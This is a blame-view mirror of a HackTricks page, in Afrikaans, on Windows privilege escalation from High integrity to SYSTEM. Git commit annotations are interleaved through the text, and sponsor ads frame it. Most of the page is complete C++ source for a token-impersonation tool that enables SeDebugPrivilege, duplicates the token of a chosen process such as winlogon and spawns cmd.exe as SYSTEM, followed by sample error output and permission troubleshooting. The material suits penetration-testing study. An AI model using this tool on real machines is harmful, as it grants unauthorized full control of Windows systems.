Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-17 06:28:27 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md

204 lines
8.4 KiB
Markdown
Raw Normal View History

Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Ander maniere om HackTricks te ondersteun:
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
## Kode
GitBook: [master] 2 pages and 2 assets modified
2020-08-30 22:32:59 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Die volgende kode van [hier](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962). Dit maak dit moontlik om **'n Proses-ID as argument aan te dui** en 'n CMD **wat as die gebruiker van die aangeduide proses loop**, sal uitgevoer word.\
Deur in 'n Hoë Integriteitsproses te loop, kan jy die PID van 'n proses wat as Stelsel loop (soos winlogon, wininit) aandui en 'n cmd.exe as stelsel uitvoer.
GitBook: [master] 2 pages and 2 assets modified
2020-08-30 22:32:59 +00:00
```cpp
impersonateuser.exe 1234
```
{% code title="impersonateuser.cpp" %}
```cpp
a
2024-02-08 04:06:37 +01:00
// From https://securitytimes.medium.com/understanding-and-abusing-access-tokens-part-ii-b9069f432962
GitBook: [master] 2 pages and 2 assets modified
2020-08-30 22:32:59 +00:00
#include <windows.h>
#include <iostream>
#include <Lmcons.h>
BOOL SetPrivilege(
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
HANDLE hToken, // access token handle
LPCTSTR lpszPrivilege, // name of privilege to enable/disable
BOOL bEnablePrivilege // to enable or disable privilege
GitBook: [master] 2 pages and 2 assets modified
2020-08-30 22:32:59 +00:00
)
{
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(
NULL, // lookup privilege on local system
lpszPrivilege, // privilege to lookup
&luid)) // receives LUID of privilege
{
printf("[-] LookupPrivilegeValue error: %u\n", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
if (!AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES)NULL,
(PDWORD)NULL))
{
printf("[-] AdjustTokenPrivileges error: %u\n", GetLastError());
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
printf("[-] The token does not have the specified privilege. \n");
return FALSE;
}
return TRUE;
GitBook: [master] 2 pages and 2 assets modified
2020-08-30 22:32:59 +00:00
}
std::string get_username()
{
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
TCHAR username[UNLEN + 1];
DWORD username_len = UNLEN + 1;
GetUserName(username, &username_len);
std::wstring username_w(username);
std::string username_s(username_w.begin(), username_w.end());
return username_s;
GitBook: [master] 2 pages and 2 assets modified
2020-08-30 22:32:59 +00:00
}
int main(int argc, char** argv) {
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
// Print whoami to compare to thread later
printf("[+] Current user is: %s\n", (get_username()).c_str());
// Grab PID from command line argument
char* pid_c = argv[1];
DWORD PID_TO_IMPERSONATE = atoi(pid_c);
// Initialize variables and structures
HANDLE tokenHandle = NULL;
HANDLE duplicateTokenHandle = NULL;
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInformation;
ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
startupInfo.cb = sizeof(STARTUPINFO);
// Add SE debug privilege
HANDLE currentTokenHandle = NULL;
BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle);
if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE))
{
printf("[+] SeDebugPrivilege enabled!\n");
}
// Call OpenProcess(), print return code and error code
HANDLE processHandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, true, PID_TO_IMPERSONATE);
if (GetLastError() == NULL)
printf("[+] OpenProcess() success!\n");
else
{
printf("[-] OpenProcess() Return Code: %i\n", processHandle);
printf("[-] OpenProcess() Error: %i\n", GetLastError());
}
// Call OpenProcessToken(), print return code and error code
BOOL getToken = OpenProcessToken(processHandle, MAXIMUM_ALLOWED, &tokenHandle);
if (GetLastError() == NULL)
printf("[+] OpenProcessToken() success!\n");
else
{
printf("[-] OpenProcessToken() Return Code: %i\n", getToken);
printf("[-] OpenProcessToken() Error: %i\n", GetLastError());
}
// Impersonate user in a thread
BOOL impersonateUser = ImpersonateLoggedOnUser(tokenHandle);
if (GetLastError() == NULL)
{
printf("[+] ImpersonatedLoggedOnUser() success!\n");
printf("[+] Current user is: %s\n", (get_username()).c_str());
printf("[+] Reverting thread to original user context\n");
RevertToSelf();
}
else
{
printf("[-] ImpersonatedLoggedOnUser() Return Code: %i\n", getToken);
printf("[-] ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());
}
// Call DuplicateTokenEx(), print return code and error code
BOOL duplicateToken = DuplicateTokenEx(tokenHandle, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle);
if (GetLastError() == NULL)
printf("[+] DuplicateTokenEx() success!\n");
else
{
printf("[-] DuplicateTokenEx() Return Code: %i\n", duplicateToken);
printf("[-] DupicateTokenEx() Error: %i\n", GetLastError());
}
// Call CreateProcessWithTokenW(), print return code and error code
BOOL createProcess = CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &startupInfo, &processInformation);
if (GetLastError() == NULL)
printf("[+] Process spawned!\n");
else
{
printf("[-] CreateProcessWithTokenW Return Code: %i\n", createProcess);
printf("[-] CreateProcessWithTokenW Error: %i\n", GetLastError());
}
return 0;
GitBook: [master] 2 pages and 2 assets modified
2020-08-30 22:32:59 +00:00
}
```
{% endcode %}
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
## Fout
GitBook: [master] 2 pages and 2 assets modified
2020-08-30 22:32:59 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
In sommige gevallen kan jy probeer om as System te impersoneer en dit sal nie werk nie en 'n uitset soos die volgende wys:
GitBook: [master] 2 pages and 2 assets modified
2020-08-30 22:32:59 +00:00
```cpp
[+] OpenProcess() success!
[+] OpenProcessToken() success!
[-] ImpersonatedLoggedOnUser() Return Code: 1
[-] ImpersonatedLoggedOnUser() Error: 5
[-] DuplicateTokenEx() Return Code: 0
[-] DupicateTokenEx() Error: 5
[-] CreateProcessWithTokenW Return Code: 0
[-] CreateProcessWithTokenW Error: 1326
```
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Dit beteken dat selfs as jy op 'n Hoë Integriteitsvlak loop, **het jy nie genoeg toestemmings nie**.\
Laten ons die huidige Administrateur toestemmings oor `svchost.exe` prosesse nagaan met behulp van **processes explorer** (of jy kan ook process hacker gebruik):
GitBook: [master] 2 pages and 2 assets modified
2020-08-30 22:32:59 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
1. Kies 'n proses van `svchost.exe`
2. Regskliek --> Eienskappe
3. Binne die "Sekuriteit" oortjie klik jy onderaan regs op die knoppie "Toestemmings"
4. Klik op "Gevorderd"
5. Kies "Administrateurs" en klik op "Wysig"
6. Klik op "Wys gevorderde toestemmings"
GitBook: [master] 2 pages and 2 assets modified
2020-08-30 22:32:59 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write
2021-10-18 11:21:18 +00:00
![](<../../.gitbook/assets/image (322).png>)
GitBook: [master] 2 pages and 2 assets modified
2020-08-30 22:32:59 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Die vorige prentjie bevat al die voorregte wat "Administrateurs" het oor die gekose proses (soos jy kan sien, het hulle slegs "Navraag" voorregte vir `svchost.exe`)
GitBook: [master] 2 pages and 2 assets modified
2020-08-30 22:32:59 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Kyk na die voorregte wat "Administrateurs" het oor `winlogon.exe`:
GitBook: [master] 2 pages and 2 assets modified
2020-08-30 22:32:59 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write
2021-10-18 11:21:18 +00:00
![](<../../.gitbook/assets/image (323).png>)
GitBook: [master] 2 pages and 2 assets modified
2020-08-30 22:32:59 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Binne daardie proses kan "Administrateurs" "Geheue lees" en "Toestemmings lees", wat waarskynlik Administrateurs in staat stel om die token wat deur hierdie proses gebruik word, te impersoneer.
GitBook: [master] 2 pages and 2 assets modified
2020-08-30 22:32:59 +00:00
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Ander maniere om HackTricks te ondersteun:
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Reference in a new issue Copy permalink